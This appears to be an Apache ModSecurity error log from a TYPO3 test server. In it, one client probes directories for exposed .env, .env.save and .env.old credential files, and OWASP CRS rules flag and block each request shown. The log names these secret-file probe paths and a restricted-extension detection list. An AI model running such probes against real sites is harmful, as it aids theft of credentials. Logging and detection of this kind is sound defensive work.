[Sat Nov 22 00:06:06.289662 2025] [:error] [pid 243340] [client 3.9.175.83:56480] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSDwXpeLEhOLAInnw0NqgwAAAAA"]
[Sat Nov 22 00:06:06.289926 2025] [:error] [pid 243340] [client 3.9.175.83:56480] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSDwXpeLEhOLAInnw0NqgwAAAAA"]
[Sat Nov 22 00:06:06.290127 2025] [:error] [pid 243340] [client 3.9.175.83:56480] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env.save"] [unique_id "aSDwXpeLEhOLAInnw0NqgwAAAAA"]
[Sat Nov 22 00:06:06.298548 2025] [:error] [pid 243341] [client 3.9.175.83:56488] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSDwXgqyqiDG5tICQX6nqAAAAAE"]
[Sat Nov 22 00:06:06.298816 2025] [:error] [pid 243341] [client 3.9.175.83:56488] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSDwXgqyqiDG5tICQX6nqAAAAAE"]
[Sat Nov 22 00:06:06.299037 2025] [:error] [pid 243341] [client 3.9.175.83:56488] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/modules/.env.save"] [unique_id "aSDwXgqyqiDG5tICQX6nqAAAAAE"]
[Sat Nov 22 00:06:06.312482 2025] [:error] [pid 243343] [client 3.9.175.83:56516] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSDwXoNKGNllPFPT2VHknQAAAAY"]
[Sat Nov 22 00:06:06.312752 2025] [:error] [pid 243343] [client 3.9.175.83:56516] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSDwXoNKGNllPFPT2VHknQAAAAY"]
[Sat Nov 22 00:06:06.312945 2025] [:error] [pid 243343] [client 3.9.175.83:56516] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.save"] [unique_id "aSDwXoNKGNllPFPT2VHknQAAAAY"]
[Sat Nov 22 00:06:06.325210 2025] [authz_core:error] [pid 243400] [client 3.9.175.83:56414] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/modules
[Sat Nov 22 00:06:06.368987 2025] [:error] [pid 243390] [client 3.9.175.83:56534] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSDwXruOi_dqsgv2AxsAXgAAAAM"]
[Sat Nov 22 00:06:06.369290 2025] [:error] [pid 243390] [client 3.9.175.83:56534] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSDwXruOi_dqsgv2AxsAXgAAAAM"]
[Sat Nov 22 00:06:06.369550 2025] [:error] [pid 243390] [client 3.9.175.83:56534] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSDwXruOi_dqsgv2AxsAXgAAAAM"]
[Sat Nov 22 00:06:06.404346 2025] [authz_core:error] [pid 243344] [client 3.9.175.83:56484] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/core
[Sat Nov 22 00:06:06.622034 2025] [:error] [pid 243341] [client 3.9.175.83:56706] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSDwXgqyqiDG5tICQX6nqQAAAAE"]
[Sat Nov 22 00:06:06.622208 2025] [:error] [pid 243341] [client 3.9.175.83:56706] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSDwXgqyqiDG5tICQX6nqQAAAAE"]
[Sat Nov 22 00:06:06.622439 2025] [:error] [pid 243341] [client 3.9.175.83:56706] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSDwXgqyqiDG5tICQX6nqQAAAAE"]
[Sat Nov 22 00:06:06.622645 2025] [:error] [pid 243341] [client 3.9.175.83:56706] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/plugins/.env.old"] [unique_id "aSDwXgqyqiDG5tICQX6nqQAAAAE"]
[Sat Nov 22 00:06:06.863867 2025] [authz_core:error] [pid 243340] [client 3.9.175.83:56712] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/plugins
[Sat Nov 22 00:06:12.344316 2025] [authz_core:error] [pid 243343] [client 3.9.175.83:59540] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/themes
[Sat Nov 22 00:06:12.391902 2025] [:error] [pid 243342] [client 3.9.175.83:59544] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSDwZCbqTrlsHApMKqWIkgAAAAI"]
[Sat Nov 22 00:06:12.392124 2025] [:error] [pid 243342] [client 3.9.175.83:59544] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSDwZCbqTrlsHApMKqWIkgAAAAI"]
[Sat Nov 22 00:06:12.392294 2025] [:error] [pid 243342] [client 3.9.175.83:59544] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env"] [unique_id "aSDwZCbqTrlsHApMKqWIkgAAAAI"]
[Sat Nov 22 00:06:12.430186 2025] [:error] [pid 243398] [client 3.9.175.83:59574] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSDwZBxGpDYkt8_grHyz1QAAAAQ"]
[Sat Nov 22 00:06:12.430422 2025] [:error] [pid 243398] [client 3.9.175.83:59574] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSDwZBxGpDYkt8_grHyz1QAAAAQ"]
[Sat Nov 22 00:06:12.430446 2025] [:error] [pid 243400] [client 3.9.175.83:59562] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSDwZPeCuJGFTSZ93xy5YwAAAAU"]
[Sat Nov 22 00:06:12.430590 2025] [:error] [pid 243398] [client 3.9.175.83:59574] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env.save"] [unique_id "aSDwZBxGpDYkt8_grHyz1QAAAAQ"]
[Sat Nov 22 00:06:12.430659 2025] [:error] [pid 243400] [client 3.9.175.83:59562] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSDwZPeCuJGFTSZ93xy5YwAAAAU"]
[Sat Nov 22 00:06:12.430814 2025] [:error] [pid 243400] [client 3.9.175.83:59562] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.save"] [unique_id "aSDwZPeCuJGFTSZ93xy5YwAAAAU"]
[Sat Nov 22 00:06:12.707425 2025] [:error] [pid 243390] [client 3.9.175.83:59566] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vendor/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSDwZLuOi_dqsgv2AxsAXwAAAAM"]
[Sat Nov 22 00:06:12.707655 2025] [:error] [pid 243390] [client 3.9.175.83:59566] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSDwZLuOi_dqsgv2AxsAXwAAAAM"]
[Sat Nov 22 00:06:12.707848 2025] [:error] [pid 243390] [client 3.9.175.83:59566] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/.env"] [unique_id "aSDwZLuOi_dqsgv2AxsAXwAAAAM"]
[Sat Nov 22 00:06:12.781773 2025] [authz_core:error] [pid 243341] [client 3.9.175.83:59594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Sat Nov 22 00:06:12.860135 2025] [:error] [pid 243340] [client 3.9.175.83:59658] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSDwZJeLEhOLAInnw0NqhQAAAAA"]
[Sat Nov 22 00:06:12.860354 2025] [:error] [pid 243340] [client 3.9.175.83:59658] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSDwZJeLEhOLAInnw0NqhQAAAAA"]
[Sat Nov 22 00:06:12.860553 2025] [:error] [pid 243340] [client 3.9.175.83:59658] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env.save"] [unique_id "aSDwZJeLEhOLAInnw0NqhQAAAAA"]
[Sat Nov 22 00:06:12.865126 2025] [:error] [pid 243344] [client 3.9.175.83:59580] [client 3.9.175.83] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSDwZBprncRmilB7cHSonAAAAAg"]
[Sat Nov 22 00:06:12.865296 2025] [:error] [pid 243344] [client 3.9.175.83:59580] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSDwZBprncRmilB7cHSonAAAAAg"]
[Sat Nov 22 00:06:12.865513 2025] [:error] [pid 243344] [client 3.9.175.83:59580] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSDwZBprncRmilB7cHSonAAAAAg"]
[Sat Nov 22 00:06:12.865715 2025] [:error] [pid 243344] [client 3.9.175.83:59580] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/themes/.env.old"] [unique_id "aSDwZBprncRmilB7cHSonAAAAAg"]
[Sat Nov 22 00:06:12.882140 2025] [:error] [pid 243343] [client 3.9.175.83:59644] [client 3.9.175.83] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSDwZINKGNllPFPT2VHknwAAAAY"]
[Sat Nov 22 00:06:12.882402 2025] [:error] [pid 243343] [client 3.9.175.83:59644] [client 3.9.175.83] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSDwZINKGNllPFPT2VHknwAAAAY"]
[Sat Nov 22 00:06:12.882609 2025] [:error] [pid 243343] [client 3.9.175.83:59644] [client 3.9.175.83] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/storage/.env"] [unique_id "aSDwZINKGNllPFPT2VHknwAAAAY"]
